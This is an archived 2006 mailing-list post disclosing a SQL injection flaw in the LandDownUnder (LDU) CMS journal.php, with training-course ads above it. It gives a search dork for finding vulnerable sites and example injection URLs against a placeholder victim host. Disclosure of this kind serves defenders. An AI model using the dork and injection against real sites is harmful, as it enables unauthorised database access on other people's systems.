Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

LDU <= 8.x (journal.php) SQL Injection Vulnerability

from [starext] Network Security [Permanent Link]
Subject: LDU <= 8.x (journal.php) SQL Injection Vulnerability
Date: 29 Dec 2006 16:26:21 -0000 
# BhhGroup.Org & Trtekforum.com

#Found By  : St@rExT

# script name : LandDownUnder [LDU]

#Version : All

#Dork : "Powered by LDU"

# Script sites : http://www.neocrome.net

#Vull name  : LDU <= 8.x (journal.php) SQL Injection Vulnerability

# Vulnerable file : Journal.inc.php

http://victim.com/[scriptpath]/journal.php?m='&s=username&w=SELECT * FROM 
$db_journals WHERE jrn_userid='$jrn_userid' AND 
jrn_minlevel<='".$usr['level']."' ORDER BY jrn_$s $w

#[SQL Vuln.] :

http://victim.com/[scriptpath]/journal.php?m='&s=username&w=[SQL Inject]

#Contact: StareXt@msn.com

                  ######## - Tüm Müslüman insanlar&#305;n Bayram&#305;n&#305; 
Kutlar&#305;m.. : ) - #####

################### -  Ne Mutlu Türküm Diyene - ###################
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • LDU <= 8.x (journal.php) SQL Injection Vulnerability, starext <=
Previous by Date:  QuickCam linux device driver allows arbitrary code execution, sapheal
Next by Date:  DoceboLMS Xss Vuln., starext
Previous by Thread:  QuickCam linux device driver allows arbitrary code execution, sapheal
Next by Thread:  DoceboLMS Xss Vuln., starext
Indexes:  [Date] [Thread] [Top] [All Lists]